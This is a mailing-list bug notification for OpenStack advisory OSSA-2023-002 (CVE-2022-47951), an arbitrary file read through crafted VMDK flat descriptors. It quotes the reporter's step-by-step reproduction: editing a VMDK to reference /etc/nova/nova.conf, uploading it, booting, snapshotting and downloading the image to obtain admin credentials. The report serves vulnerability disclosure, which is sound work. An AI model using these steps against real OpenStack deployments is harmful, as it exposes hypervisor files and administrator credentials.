Reviewed: https://review.opendev.org/c/openstack/ossa/+/871635 Committed: https://opendev.org/openstack/ossa/commit/07833d0dcd6f0745a7a487f55d5a23ff76d4c202 Submitter: "Zuul (22348)" Branch: master
commit 07833d0dcd6f0745a7a487f55d5a23ff76d4c202 Author: Jeremy Stanley <[email protected]> Date: Tue Jan 24 15:11:10 2023 +0000 Add OSSA-2023-002 (CVE-2022-47951) Change-Id: If071ca13337d87f24bbbdec24cbecb826165f4f4 Closes-Bug: #1996188 ** Changed in: ossa Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1996188 Title: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951) Status in Cinder: In Progress Status in Glance: In Progress Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Fix Released Bug description: The vulnerability managers received the following report from Sébastien Meriot with OVH via encrypted E-mail: Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system. After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N). Here is the details : By using a VMDK file, you can dump any file on the hypervisor. 1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat 2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0 3. Upload the image: openstack image create --file leak.vmdk leak.vmdk 4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance 5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance 6. Download the image: openstack image save --file leak-instance-image leak-instance-image 7. You get access to the nova.conf file content and you can get access to the openstack admin creds. We are working on a fix and would be happy to share it with you if needed. We think it does affect Nova but it could affect Glance as well. We're not sure yet. [postscript per Arnaud Morin (amorin) in IRC] cinder seems also affected To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : [email protected] Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
